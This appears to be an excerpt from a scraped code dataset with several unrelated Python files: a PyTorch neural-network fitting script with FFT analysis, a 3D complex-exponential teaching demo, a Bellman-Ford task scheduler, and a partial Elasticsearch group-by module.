np.concatenate([sel_ind, [Last_ind]])\n return sel_ind\n\n\nR[\"n_fixed\"] = 0\n\nmin_n = np.min([R[\"n_fixed\"], R[\"hidden_units\"][0]])\nR[\"n_fixed\"] = min_n\n# print(min_n)\nw_Univ0, b_Univ0 = getWini(\n hidden_units=R[\"hidden_units\"],\n input_dim=R[\"input_dim\"],\n output_dim_final=R[\"output_dim\"],\n astddev=R[\"astddev\"],\n bstddev=R[\"bstddev\"],\n)\n\nprint(np.shape(w_Univ0[0]))\nprint(np.shape(b_Univ0[0]))\n\n\nclass Network(nn.Module): # DNN 0: ReLU; 1: Tanh; 2:Sin; 3:x**50; 4:Sigmoid\n def __init__(self):\n super(Network, self).__init__()\n self.block3 = nn.Sequential()\n self.block = nn.Sequential()\n for i in range(len(R[\"full_net\"]) - 2):\n d_linear = nn.Linear(R[\"full_net\"][i], R[\"full_net\"][i + 1])\n print(\"weight1: start\")\n print(np.shape(d_linear.weight.data.numpy()))\n print(\"weight1: end\")\n d_linear.weight.data = torch.nn.Parameter(torch.tensor(w_Univ0[i]))\n d_linear.bias.data = torch.nn.Parameter(torch.tensor(b_Univ0[i]))\n # print(d_linear.weight)\n print(\"weight2: start\")\n print(np.shape(d_linear.weight.data.numpy()))\n print(\"weight2: end\")\n self.block3.add_module(\"linear\" + str(i), d_linear)\n\n self.block.add_module(\"linear\" + str(i), d_linear)\n if R[\"ActFuc\"] == 0:\n self.block.add_module(\"relu\" + str(i), nn.ReLU())\n self.block3.add_module(\"relu\" + str(i), nn.ReLU())\n elif R[\"ActFuc\"] == 1:\n self.block.add_module(\"tanh\" + str(i), nn.Tanh())\n self.block3.add_module(\"tanh\" + str(i), nn.Tanh())\n elif R[\"ActFuc\"] == 3:\n self.block.add_module(\"relu3\" + str(i), Act_op())\n self.block3.add_module(\"relu3\" + str(i), Act_op())\n i = len(R[\"full_net\"]) - 2\n d_linear = nn.Linear(R[\"full_net\"][i], R[\"full_net\"][i + 1], bias=False)\n d_linear.weight.data = torch.nn.Parameter(torch.tensor(w_Univ0[i]))\n # d_linear.bias.data = torch.nn.Parameter(torch.tensor(b_Univ0[i]))\n self.block.add_module(\"linear\" + str(i), d_linear)\n if R[\"asi\"]:\n self.block2 = nn.Sequential()\n for i in range(len(R[\"full_net\"]) - 2):\n d_linear = nn.Linear(R[\"full_net\"][i], R[\"full_net\"][i + 1])\n print(\"weight1: start\")\n print(np.shape(d_linear.weight.data.numpy()))\n print(\"weight1: end\")\n d_linear.weight.data = torch.nn.Parameter(torch.tensor(w_Univ0[i]))\n d_linear.bias.data = torch.nn.Parameter(torch.tensor(b_Univ0[i]))\n # print(d_linear.weight)\n print(\"weight2: start\")\n print(np.shape(d_linear.weight.data.numpy()))\n print(\"weight2: end\")\n # d_linear.weight.data = torch.tensor(w_Univ0[i])\n # d_linear.bias.data = torch.tensor(b_Univ0[i])\n self.block2.add_module(\"linear2\" + str(i), d_linear)\n if R[\"ActFuc\"] == 0:\n self.block2.add_module(\"relu2\" + str(i), nn.ReLU())\n elif R[\"ActFuc\"] == 1:\n self.block2.add_module(\"tanh2\" + str(i), nn.Tanh())\n elif R[\"ActFuc\"] == 2:\n self.block2.add_module(\"sin2\" + str(i), nn.sin())\n elif R[\"ActFuc\"] == 3:\n self.block2.add_module(\"**502\" + str(i), Act_op())\n elif R[\"ActFuc\"] == 4:\n self.block2.add_module(\"sigmoid2\" + str(i), nn.sigmoid())\n i = len(R[\"full_net\"]) - 2\n d_linear = nn.Linear(R[\"full_net\"][i], R[\"full_net\"][i + 1], bias=False)\n d_linear.weight.data = torch.nn.Parameter(torch.tensor(-w_Univ0[i]))\n d_linear.bias.data = torch.nn.Parameter(torch.tensor(-b_Univ0[i]))\n self.block2.add_module(\"linear2\" + str(i), d_linear)\n\n def forward(self, x):\n if R[\"asi\"]:\n out = self.block(x) + self.block2(x)\n else:\n out = self.block(x)\n return out\n\n def hidden(self, x):\n out = self.block3(x)\n return out\n\n\nclass Model:\n def __init__(self):\n\n # y_train = net_(torch.FloatTensor(train_inputs).to(device))\n y_train = net_(torch.FloatTensor(train_inputs).to(device))\n loss_train = float(\n criterion(y_train.cpu(), torch.FloatTensor(R[\"y_true_train\"])).cpu()\n )\n y_test = net_(torch.FloatTensor(test_inputs).to(device))\n # loss_test = float(criterion(y_test.cpu(), torch.FloatTensor(R['y_true_test'])).cpu())\n\n nametmp = \"%smodel/\" % (FolderName)\n mkdir(nametmp)\n torch.save(net_.state_dict(), \"%smodel.ckpt\" % (nametmp))\n\n R[\"y_train\"] = y_train.cpu().detach().numpy()\n R[\"y_test\"] = y_test.cpu().detach().numpy()\n # self.record_weight()\n\n R[\"loss_train\"] = [loss_train]\n\n def run_onestep(self, optimizer):\n\n y_test = net_(torch.FloatTensor(test_inputs).to(device))\n # loss_test = float(criterion(y_test, torch.FloatTensor(R['y_true_test']).to(device)).cpu())\n y_train = net_(torch.FloatTensor(train_inputs).to(device))\n loss_train = float(\n criterion(y_train, torch.FloatTensor(R[\"y_true_train\"]).to(device)).cpu()\n )\n\n R[\"y_train\"] = y_train.cpu().detach().numpy()\n R[\"y_test\"] = y_test.cpu().detach().numpy()\n R[\"loss_train\"].append(loss_train)\n\n # optimizer = torch.optim.SGD(\n # net_.parameters(), lr=R['learning_rate'], momentum=0.)\n\n for i in range(R[\"train_size\"] // R[\"batch_size\"] + 1): # bootstrap\n\n mask = np.random.choice(R[\"train_size\"], R[\"batch_size\"], replace=False)\n y_train = net_(torch.FloatTensor(train_inputs[mask]).to(device))\n loss = criterion(\n y_train, torch.FloatTensor(R[\"y_true_train\"][mask]).to(device)\n )\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n R[\"learning_rate\"] = R[\"learning_rate\"] * (1 - R[\"learning_rateDecay\"])\n\n # def record_weight(self):\n # if R['hidden_units'][0] == 1:\n # tmp_w1 = np.squeeze(net_.block[0].weight.cpu().detach().numpy())\n # tmp_b1 = np.squeeze(net_.block[0].bias.cpu().detach().numpy())\n # tmp_w2 = np.squeeze(net_.block[2].weight.cpu().detach().numpy())\n # tmp_w = [tmp_w1, tmp_b1, tmp_w2]\n # else:\n # tmp_w1 = np.squeeze(net_.block[0].weight.cpu().detach().numpy())\n # tmp_b1 = np.squeeze(net_.block[0].bias.cpu().detach().numpy())\n # tmp_w2 = np.squeeze(net_.block[2].weight.cpu().detach().numpy())\n # # tmp_w2=np.squeeze(net_.block[2].weight.cpu().detach().numpy())[0:R['n_fixed']]\n # tmp_w = np.concatenate((tmp_w1, tmp_b1, tmp_w2), axis=0)\n # Rw['weight_R'].append(tmp_w)\n\n def run(self, step_n=1):\n\n # Load paremeters\n nametmp = \"%smodel/model.ckpt\" % (FolderName)\n net_.load_state_dict(torch.load(nametmp))\n net_.eval()\n optimizer = torch.optim.Adam(net_.parameters(), lr=2e-4)\n\n for epoch in range(step_n):\n\n self.run_onestep(optimizer)\n # self.record_weight()\n Ry[\"y_all\"].append(R[\"y_train\"])\n\n if epoch % plot_epoch == 0:\n\n print(\"time elapse: %.3f\" % (time.time() - t0))\n print(\"model, epoch: %d, train loss: %f\" % (epoch, R[\"loss_train\"][-1]))\n self.plot_loss()\n self.plot_y(name=\"%s\" % (epoch))\n self.save_file()\n\n if R[\"loss_train\"][-1] < 1e-5:\n break\n\n def plot_weight(self):\n weight_R = np.stack(Rw[\"weight_R\"])\n plt.figure()\n for i_sub in range(R[\"n_fixed\"]):\n # print(i_sub)\n for ji in range(3):\n # print('%s'%(3*i_sub+ji))\n ax = plt.subplot(R[\"n_fixed\"], 3, 3 * i_sub + ji + 1)\n ax.plot(abs(weight_R[:, ji * R[\"n_fixed\"] + i_sub]))\n plt.title(\"%s\" % (3 * i_sub + ji))\n ax.set_xscale(\"log\")\n ax.set_yscale(\"log\")\n ax.set_ylim([5e-2, 1e1])\n # ax.axis('off')\n # ax.text(-0.5,1,'%.2f'%(output_weight[i_sub]))\n\n # ax.set_xscale('log')\n # ax.set_yscale('log')\n # plt.legend(fontsize=18)\n # plt.title('loss',fontsize=15)\n # fntmp = '%shiddeny%s'%(FolderName,epoch)\n fntmp = \"%sweightevolve\" % (FolderName)\n save_fig(plt, fntmp, iseps=0)\n\n def plot_loss(self):\n\n plt.figure()\n ax = plt.gca()\n # y1 = R['loss_test']\n y2 = np.asarray(R[\"loss_train\"])\n # plt.plot(y1,'ro',label='Test')\n plt.plot(y2, \"k-\", label=\"Train\")\n if len(R[\"tuning_ind\"]) > 0:\n plt.plot(R[\"tuning_ind\"], y2[R[\"tuning_ind\"]], \"r*\")\n ax.set_xscale(\"log\")\n ax.set_yscale(\"log\")\n plt.legend(fontsize=18)\n plt.title(\"loss\", fontsize=15)\n fntmp = \"%sloss\" % (FolderName)\n save_fig(plt, fntmp, ax=ax, isax=1, iseps=0)\n\n def plot_tuning(self):\n plt.figure()\n ax = plt.gca()\n y2 = R[\"y_true_train\"]\n plt.plot(train_inputs, y2, \"b*\", label=\"True\")\n for iit in range(len(R[\"y_tuning\"])):\n plt.plot(\n test_inputs,\n R[\"y_tuning\"][iit],\n \"-\",\n label=\"%.3f\" % (R[\"loss_tuning\"][iit]),\n )\n plt.title(\"turn points\", fontsize=15)\n plt.legend(fontsize=18)\n fntmp = \"%sturn\" % (FolderName)\n save_fig(plt, fntmp, ax=ax, isax=1, iseps=0)\n\n def plot_y(self, name=\"\"):\n\n if R[\"input_dim\"] == 2:\n X = np.arange(R[\"x_start\"], R[\"x_end\"], 0.1)\n Y = np.arange(R[\"x_start\"], R[\"x_end\"], 0.1)\n X, Y = np.meshgrid(X, Y)\n xy = np.concatenate(\n (np.reshape(X, [-1, 1]), np.reshape(Y, [-1, 1])), axis=1\n )\n Z = np.reshape(get_y(xy), [len(X), -1])\n\n fp = plt.figure()\n ax = fp.gca(projection=\"3d\")\n surf = ax.plot_surface(\n X, Y, Z - np.min(Z), cmap=cm.coolwarm, linewidth=0, antialiased=False\n )\n ax.zaxis.set_major_locator(LinearLocator(5))\n ax.zaxis.set_major_formatter(FormatStrFormatter(\"%.02f\"))\n fp.colorbar(surf, shrink=0.5, aspect=5)\n ax.scatter(\n train_inputs[:, 0],\n train_inputs[:, 1],\n R[\"y_train\"] - np.min(R[\"y_train\"]),\n )\n fntmp = \"%s2du%s\" % (FolderName, name)\n save_fig(plt, fntmp, ax=ax, isax=1, iseps=0)\n\n if R[\"input_dim\"] == 1:\n plt.figure()\n ax = plt.gca()\n y1 = R[\"y_test\"]\n y2 = R[\"y_true_train\"]\n plt.plot(test_inputs, y1, \"r-\", label=\"Test\")\n plt.plot(train_inputs, y2, \"b*\", label=\"True\")\n plt.title(\"g2u\", fontsize=15)\n plt.legend(fontsize=18)\n fntmp = \"%su_m%s\" % (FolderName, name)\n fntmp = \"%su_m%s\" % (FolderName, \"\")\n save_fig(plt, fntmp, ax=ax, isax=1, iseps=0)\n\n def save_file(self):\n with open(\"%s/objs.pkl\" % (FolderName), \"wb\") as f:\n pickle.dump(R, f, protocol=4)\n with open(\"%s/objsy.pkl\" % (FolderName), \"wb\") as f:\n pickle.dump(Ry, f, protocol=4)\n with open(\"%s/objsw.pkl\" % (FolderName), \"wb\") as f:\n pickle.dump(Rw, f, protocol=4)\n text_file = open(\"%s/Output.txt\" % (FolderName), \"w\")\n for para in R:\n if np.size(R[para]) > 20:\n continue\n text_file.write(\"%s: %s\\n\" % (para, R[para]))\n text_file.write(\"loss end: %s\\n\" % (R[\"loss_train\"][-1]))\n # text_file.write('weight ini: %s\\n' % (Rw['weight_R'][0]))\n text_file.close()\n\n\nt0 = time.time()\nnet_ = Network().to(device)\n# net_.apply(weights_init)\nprint(net_)\n\ncriterion = nn.MSELoss(reduction=\"mean\").to(device)\nmodel = Model()\nmodel.run(3000)\n\ny_pred = R[\"y_train\"]\ny_fft = my_fft(R[\"y_true_train\"]) / R[\"train_size\"]\nplt.semilogy(y_fft + 1e-5, label=\"real\")\nidx = SelectPeakIndex(y_fft, endpoint=False)\nplt.semilogy(idx, y_fft[idx] + 1e-5, \"o\")\ny_fft_pred = my_fft(y_pred) / R[\"train_size\"]\nplt.semilogy(y_fft_pred + 1e-5, label=\"train\")\nplt.semilogy(idx, y_fft_pred[idx] + 1e-5, \"o\")\nplt.legend()\nplt.xlabel(\"freq idx\")\nplt.ylabel(\"freq\")\nplt.savefig(FolderName + \"fft.png\")\n\ny_pred_epoch = np.squeeze(Ry[\"y_all\"])\nidx1 = idx[:3]\nabs_err = np.zeros([len(idx1), len(Ry[\"y_all\"])])\ny_fft = my_fft(R[\"y_true_train\"])\ntmp1 = y_fft[idx1]\nfor i in range(len(y_pred_epoch)):\n tmp2 = my_fft(y_pred_epoch[i])[idx1]\n abs_err[:, i] = np.abs(tmp1 - tmp2) / (1e-5 + tmp1)\n\nplt.figure()\nplt.pcolor(abs_err, cmap=\"RdBu\", vmin=0.1, vmax=1)\nplt.colorbar()\nplt.savefig(FolderName + \"/hot.png\")\n","repo_name":"paoxiaode/MATH8013","sub_path":"result/fitndtorch.py","file_name":"fitndtorch.py","file_ext":"py","file_size_in_byte":21520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"27401265310","text":"import numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\n\nassert Axes3D\n\ntitle = \"Exponentielle complexe 3D\"\nauthors = \"F. Orieux\"\nemail = \"orieux@l2s.centralesupelec.fr\"\n\n\ndef expc(t, A=1, r=0.2, ω=5):\n p = r + 1j * ω\n return A * np.exp(2 * np.pi * p * t)\n\n\nclass Demo:\n def __init__(self, fig):\n fig.clf()\n self.t = np.linspace(-1, 1, 1000)\n self.axe = fig.add_subplot(111, projection=\"3d\", proj_type=\"ortho\")\n res = expc(self.t)\n (self.line,) = self.axe.plot(self.t, np.real(res), np.imag(res))\n\n self.axe.set_xlabel(\"t\", labelpad=30)\n self.axe.set_ylabel(r\"$Re[e^{pt}]$\", labelpad=30)\n self.axe.set_zlabel(r\"$Im[e^{pt}]$\", labelpad=30)\n\n self.axe.set_title(\n r\"L'exponentielle complexe $e^{pt} = e^{σt}e^{ιωt} = \"\n r\"e^{σt} × [cos(ωt) + ι sin(ω t)]$, $p = σ + ι ω$\",\n )\n\n def interact(\n self,\n A: (0, 2, 10) = 1,\n r: (-0.3, 0.3, 10) = 0.2,\n ω: (-10.0, 10.0, 10) = 5,\n pr: \"Im.\" = None,\n pi: \"Re.\" = None,\n pt: \"Proj. t\" = None,\n ):\n res = expc(self.t, A=A, r=r, ω=ω)\n self.line.set_data_3d(self.t, np.real(res), np.imag(res))\n\n if pr:\n self.axe.view_init(elev=0, azim=-90)\n\n if pi:\n self.axe.view_init(elev=90, azim=-90)\n\n if pt:\n self.axe.view_init(elev=0, azim=0)\n","repo_name":"forieux/teachapp","sub_path":"demos/Bases du signal/expc3d.py","file_name":"expc3d.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"4816237779","text":"import networkx as nx\r\n\r\n\r\ndef get_user_input():\r\n constraints = []\r\n\r\n num_tasks = int(input(\"Enter the number of tasks: \"))\r\n\r\n for i in range(num_tasks):\r\n while True:\r\n duration = input(\r\n f\"Enter the duration (in hours) of task {i + 1} (e.g., '2' or '1-2' for a range): \"\r\n )\r\n if \"-\" in duration:\r\n try:\r\n min_duration, max_duration = map(int, duration.split(\"-\"))\r\n\r\n if min_duration <= max_duration:\r\n constraints.append(\r\n (i, i + 1, range(min_duration, max_duration + 1))\r\n )\r\n break\r\n else:\r\n print(\r\n \"Invalid duration range. Please ensure the start of the range is less than or equal to the end.\"\r\n )\r\n except ValueError:\r\n print(\r\n \"Invalid range. Please enter in the correct format (e.g., '1-2').\"\r\n )\r\n else:\r\n try:\r\n fixed_duration = int(duration)\r\n constraints.append((i, i + 1, fixed_duration))\r\n break\r\n except ValueError:\r\n print(\"Invalid input. Please enter an integer.\")\r\n\r\n return constraints, num_tasks\r\n\r\n\r\ndef convert_to_24_hour_format(time_str):\r\n \"\"\"\r\n Converts a time string in the format \"hh am/pm\" to a 24-hour format.\r\n \"\"\"\r\n time, period = time_str.split()\r\n hour = int(time)\r\n\r\n if period.lower() == \"pm\" and hour != 12:\r\n hour += 12\r\n elif period.lower() == \"am\" and hour == 12:\r\n hour = 0\r\n\r\n return hour\r\n\r\n\r\ndef format_constraints(constraints):\r\n formatted_constraints = []\r\n\r\n for constraint in constraints:\r\n task_i, task_j, duration = constraint\r\n\r\n if isinstance(duration, range):\r\n l = min(duration)\r\n u = max(duration)\r\n formatted_constraints.append(f\"{l} <= t(x{task_j}) - t(x{task_i}) <= {u}\")\r\n else:\r\n formatted_constraints.append(\r\n f\"{duration} <= t(x{task_j}) - t(x{task_i}) <= {duration}\"\r\n )\r\n return formatted_constraints\r\n\r\n\r\ndef build_graph(constraints, num_tasks, start_hour, end_hour):\r\n G = nx.DiGraph()\r\n\r\n G.add_node(\"x0\")\r\n\r\n G.add_edge(\"x0\", \"x1\", weight=start_hour)\r\n total_hours = end_hour - start_hour\r\n\r\n G.add_edge(\"x0\", f\"x{num_tasks}\", weight=total_hours)\r\n\r\n for xi, xj, duration in constraints:\r\n if isinstance(duration, range):\r\n l = min(duration)\r\n u = max(duration)\r\n else:\r\n l = u = duration\r\n\r\n G.add_edge(f\"x{xi}\", f\"x{xj}\", weight=u)\r\n if not (f\"x{xi}\" == f\"x{num_tasks}\" and f\"x{xj}\" == \"x0\"):\r\n G.add_edge(f\"x{xj}\", f\"x{xi}\", weight=-l)\r\n\r\n return G\r\n\r\n\r\ndef bellman_ford(G, source):\r\n distances = {node: float(\"inf\") for node in G.nodes()}\r\n predecessor = {node: None for node in G.nodes()}\r\n distances[source] = 0\r\n\r\n for _ in range(len(G.nodes()) - 1):\r\n for u, v, weight in G.edges(data=\"weight\"):\r\n if distances[u] != float(\"inf\") and distances[u] + weight < distances[v]:\r\n distances[v] = distances[u] + weight\r\n predecessor[v] = u\r\n\r\n for u, v, weight in G.edges(data=\"weight\"):\r\n if distances[u] != float(\"inf\") and distances[u] + weight < distances[v]:\r\n cycle = [v, u]\r\n while predecessor[u] not in cycle:\r\n cycle.append(predecessor[u])\r\n u = predecessor[u]\r\n cycle.append(predecessor[u])\r\n print(\"Negative cycle detected: \", \" -> \".join(cycle))\r\n return (\r\n None,\r\n None,\r\n )\r\n\r\n return distances, predecessor\r\n\r\n\r\ndef print_graph(G):\r\n print(\"\\nGraph:\")\r\n print(\"Nodes:\", G.nodes())\r\n print(\"Edges:\")\r\n for edge in G.edges(data=True):\r\n print(f\"{edge[0]} -> {edge[1]} (weight: {edge[2]['weight']})\")\r\n\r\n\r\ndef time_conversion(hour, start_hour):\r\n \"\"\"Converts the hour to a 12-hour format with AM/PM.\"\"\"\r\n adjusted_hour = (hour + start_hour) % 24\r\n if adjusted_hour == 0:\r\n return \"12 AM\"\r\n elif adjusted_hour < 12:\r\n return f\"{adjusted_hour} AM\"\r\n elif adjusted_hour == 12:\r\n return \"12 PM\"\r\n else:\r\n return f\"{adjusted_hour - 12} PM\"\r\n\r\n\r\ndef adjust_constraints(\r\n constraints, task_to_change, new_start_time, num_tasks, start_hour, end_hour\r\n):\r\n \"\"\"\r\n Adjusts the constraints when a task's start time is changed by the user.\r\n Only the constraints for the tasks that come after the fixed task are updated.\r\n \"\"\"\r\n\r\n new_start_hour = convert_to_24_hour_format(new_start_time)\r\n updated_task_index = task_to_change\r\n new_constraints = []\r\n\r\n # Adjust constraints for the remaining tasks relative to the updated task\r\n for i, (task_i, task_j, duration) in enumerate(constraints):\r\n if task_i >= updated_task_index:\r\n # Reindex the tasks relative to the updated task\r\n new_task_i = task_i - updated_task_index\r\n new_task_j = task_j - updated_task_index\r\n new_constraints.append((new_task_i, new_task_j, duration))\r\n\r\n # Adjust the global constraint for the end of the day based on the new start time\r\n remaining_hours = end_hour - new_start_hour\r\n new_constraints.insert(\r\n 0, (0, num_tasks - updated_task_index, range(0, remaining_hours + 1))\r\n )\r\n\r\n return new_constraints\r\n\r\n\r\ndef main():\r\n constraints, num_tasks = get_user_input()\r\n while True:\r\n start_time_str = input(\r\n \"Enter the hour you want to start your day (e.g., '5 am'): \"\r\n )\r\n end_time_str = input(\r\n \"Enter the hour you want to end your day (e.g., '10 pm'): \"\r\n )\r\n\r\n start_hour = convert_to_24_hour_format(start_time_str)\r\n end_hour = convert_to_24_hour_format(end_time_str)\r\n\r\n if start_hour < end_hour:\r\n break\r\n else:\r\n print(\r\n \"Invalid time range! Please make sure the start time is earlier than the end time. Try again.\"\r\n )\r\n\r\n total_hours = end_hour - start_hour\r\n\r\n constraints.append((0, num_tasks, range(0, total_hours + 1)))\r\n\r\n print(\"\\nConstraints:\")\r\n formatted_constraints = format_constraints(constraints)\r\n for constraint in formatted_constraints:\r\n print(constraint)\r\n\r\n G = build_graph(constraints, num_tasks, start_hour, end_hour)\r\n\r\n # Run Bellman-Ford for earliest start times\r\n G_earliest = G.reverse(copy=True)\r\n print(print_graph(G))\r\n print(\"\\nCalculating earliest start times...\")\r\n result_earliest = bellman_ford(G_earliest, \"x0\")\r\n if result_earliest == (None, None):\r\n print(\"Negative cycle detected for earliest start times. No solution exists.\")\r\n return 0\r\n else:\r\n distances_earliest, _ = result_earliest\r\n\r\n # Run Bellman-Ford for latest start times\r\n print(\"\\nCalculating latest start times...\")\r\n result_latest = bellman_ford(G, \"x0\")\r\n if result_latest == (None, None):\r\n print(\"Negative cycle detected for latest start times. No solution exists.\")\r\n return 0\r\n else:\r\n distances_latest, _ = result_latest\r\n \r\n print(\"\\nLatest start times:\")\r\n for node in sorted(distances_latest.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n print(f\"{node}: {time_conversion(distances_latest[node], start_hour)}\")\r\n\r\n print(\"\\nEarliest start times:\")\r\n for node in sorted(distances_earliest.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n print(f\"{node}: {time_conversion(-distances_earliest[node], start_hour)}\")\r\n\r\n\r\n print(\"SHORTEST PATH COMPUTATIONS:\")\r\n print(\"\\nTotal Duration of Shortest Paths for Earliest Start Times:\")\r\n for node in sorted(distances_earliest.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n total_duration_earliest = -distances_earliest[\r\n node\r\n ] # Use negative value for earliest start times\r\n print(f\"Total duration to {node} (Earliest): {total_duration_earliest} hour(s)\")\r\n\r\n print(\"\\nTotal Duration of Shortest Paths for Latest Start Times:\")\r\n for node in sorted(distances_latest.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n total_duration_latest = distances_latest[node]\r\n print(f\"Total duration to {node} (Latest): {total_duration_latest} hour(s)\")\r\n \r\n\r\n\r\n\r\n\r\n # Ask if the user wants to change anything\r\n while True:\r\n change_schedule = (\r\n input(\"Would you like to change any task in the schedule? (yes/no): \")\r\n .strip()\r\n .lower()\r\n )\r\n\r\n if change_schedule == \"no\":\r\n break # Exit the loop if the user doesn't want to change the schedule\r\n \r\n print(\"\\nAvailable time ranges for each task:\")\r\n for i in range(1, num_tasks + 1):\r\n earliest_time = time_conversion(-distances_earliest[f\"x{i}\"], start_hour)\r\n latest_time = time_conversion(distances_latest[f\"x{i}\"], start_hour)\r\n print(f\"Task {i}: {earliest_time} - {latest_time}\")\r\n task_to_change = int(\r\n input(\"Which task number do you want to change? (Enter the task number): \")\r\n )\r\n\r\n # Update the last updated task\r\n last_updated_task = task_to_change\r\n\r\n # Ask for a new time within this range\r\n new_time_str = input(\r\n f\"Enter the new start time for Task {task_to_change} (within the range above): \"\r\n )\r\n new_time_hour = convert_to_24_hour_format(new_time_str)\r\n constraints = adjust_constraints(\r\n constraints, task_to_change, new_time_str, num_tasks, start_hour, end_hour\r\n )\r\n updated_task_index = task_to_change\r\n # Rebuild the graph with updated constraints for the uncompleted tasks\r\n\r\n G_updated = build_graph(\r\n constraints, # Only use constraints from updated tasks onwards\r\n num_tasks - updated_task_index, # Adjust the number of tasks accordingly\r\n new_time_hour,\r\n end_hour,\r\n )\r\n\r\n\r\n print(\r\n \"\\nRecalculating times for subsequent tasks starting from the updated task...\"\r\n )\r\n\r\n result_earliest_updated = bellman_ford(G_updated.reverse(copy=True), \"x0\")\r\n\r\n result_latest_updated = bellman_ford(G_updated, \"x0\")\r\n\r\n if result_earliest_updated == (None, None):\r\n print(\r\n \"Negative cycle detected for earliest start times. No solution exists.\"\r\n )\r\n return 0\r\n else:\r\n distances_earliest_updated, _ = result_earliest_updated\r\n\r\n print(\"\\nCalculating latest start times...\")\r\n if result_latest_updated == (None, None):\r\n print(\"Negative cycle detected for latest start times. No solution exists.\")\r\n return 0\r\n else:\r\n distances_latest_updated, _ = result_latest_updated\r\n\r\n\r\n print(\"SHORTEST PATH COMPUTATIONS:\")\r\n print(\"\\nTotal Duration of Shortest Paths for Earliest Start Times:\")\r\n for node in sorted(distances_earliest_updated.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n total_duration_earliest_updated = -distances_earliest_updated[\r\n node\r\n ] # Use negative value for earliest start times\r\n print(f\"Total duration to {node} (Earliest): {total_duration_earliest_updated} hour(s)\")\r\n\r\n print(\"\\nTotal Duration of Shortest Paths for Latest Start Times:\")\r\n for node in sorted(distances_latest_updated.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n total_duration_latest_updated = distances_latest_updated[node]\r\n print(f\"Total duration to {node} (Latest): {total_duration_latest_updated} hour(s)\")\r\n \r\n\r\n# Print Latest Start Times\r\n print(\"\\nLatest start times:\")\r\n for node in sorted(distances_latest_updated.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n print(f\"{node}: {time_conversion(distances_latest_updated[node], new_time_hour)}\")\r\n\r\n # Print Earliest Start Times\r\n print(\"\\nEarliest start times:\")\r\n for node in sorted(distances_earliest_updated.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n print(f\"{node}: {time_conversion(-distances_earliest_updated[node], new_time_hour)}\")\r\n\r\n\r\n start_hour=new_time_hour\r\n\r\n distances_earliest=distances_earliest_updated\r\n distances_latest=distances_latest_updated\r\n\r\n num_tasks=num_tasks-task_to_change\r\n\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n main()","repo_name":"JSutanto19/DSCI-599-Frontend","sub_path":"code/backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":13147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41621864130","text":"from elasticsearch_dsl import A, Q, AttrDict\n\nimport settings\nfrom core.cursor import decode_group_by_cursor\nfrom core.group_by.utils import get_bucket_keys, parse_group_by\nfrom core.validate import validate_group_by\nfrom core.preference import clean_preference\nfrom core.utils import get_field\nfrom countries import GLOBAL_SOUTH_COUNTRIES\n\n\n\"\"\"\nBucket creation.\n\"\"\"\n\n\ndef create_group_by_buckets(fields_dict, group_by_item, s, params):\n cursor = params.get(\"cursor\")\n q = params.get(\"q\")\n per_page = 500 if q else params.get(\"per_page\")\n sort_params = params.get(\"sort\")\n\n s = s.params(preference=clean_preference(group_by_item))\n field = get_field(fields_dict, group_by_item)\n validate_group_by(field, params)\n\n if field.param in [\"best_open_version\", \"version\"] or \"continent\" in field.param:\n return s\n\n group_by, known = parse_group_by(group_by_item)\n group_by_field = field.alias if field.alias else field.es_sort_field()\n\n bucket_keys = get_bucket_keys(group_by)\n\n missing = get_missing(field)\n shard_size = determine_shard_size(q)\n\n s = filter_by_repository_or_journal(field, s)\n\n if sort_params:\n create_sorted_group_by_buckets(\n bucket_keys,\n group_by_field,\n known,\n missing,\n per_page,\n s,\n shard_size,\n sort_params,\n )\n elif \"is_global_south\" in field.param:\n create_global_south_group_by_buckets(bucket_keys, group_by_field, s)\n elif (\n field.param in settings.EXTERNAL_ID_FIELDS\n or field.param in settings.BOOLEAN_TEXT_FIELDS\n ):\n create_boolean_group_by_buckets(bucket_keys, group_by_field, s)\n elif cursor:\n if cursor and cursor != \"*\":\n after_key = decode_group_by_cursor(cursor)\n else:\n after_key = None\n create_pagination_group_by_buckets(\n bucket_keys, group_by_field, known, missing, params, s, after_key\n )\n else:\n create_default_group_by_buckets(\n bucket_keys, group_by_field, known, missing, per_page, s, shard_size\n )\n\n return s\n\n\ndef create_sorted_group_by_buckets(\n bucket_keys, group_by_field, known, missing, per_page, s, shard_size, sort_params\n):\n for key, order in sort_params.items():\n if key in [\"count\", \"key\"]:\n order_key = f\"_{key}\"\n a = A(\n \"terms\",\n field=group_by_field,\n order={order_key: order},\n size=per_page,\n shard_size=shard_size,\n )\n if not known:\n a.missing = missing\n s.aggs.bucket(bucket_keys[\"default\"], a)\n return s\n\n\ndef create_global_south_group_by_buckets(bucket_keys, group_by_field, s):\n country_codes = [c[\"country_code\"] for c in GLOBAL_SOUTH_COUNTRIES]\n exists = A(\"filter\", Q(\"terms\", **{group_by_field: country_codes}))\n not_exists = A(\"filter\", ~Q(\"terms\", **{group_by_field: country_codes}))\n s.aggs.bucket(bucket_keys[\"exists\"], exists)\n s.aggs.bucket(bucket_keys[\"not_exists\"], not_exists)\n return s\n\n\ndef create_boolean_group_by_buckets(bucket_keys, group_by_field, s):\n exists = A(\"filter\", Q(\"exists\", field=group_by_field))\n not_exists = A(\"filter\", ~Q(\"exists\", field=group_by_field))\n s.aggs.bucket(bucket_keys[\"exists\"], exists)\n s.aggs.bucket(bucket_keys[\"not_exists\"], not_exists)\n return s\n\n\ndef create_pagination_group_by_buckets(\n bucket_keys, group_by_field, known, missing, params, s, after_key\n):\n sources = 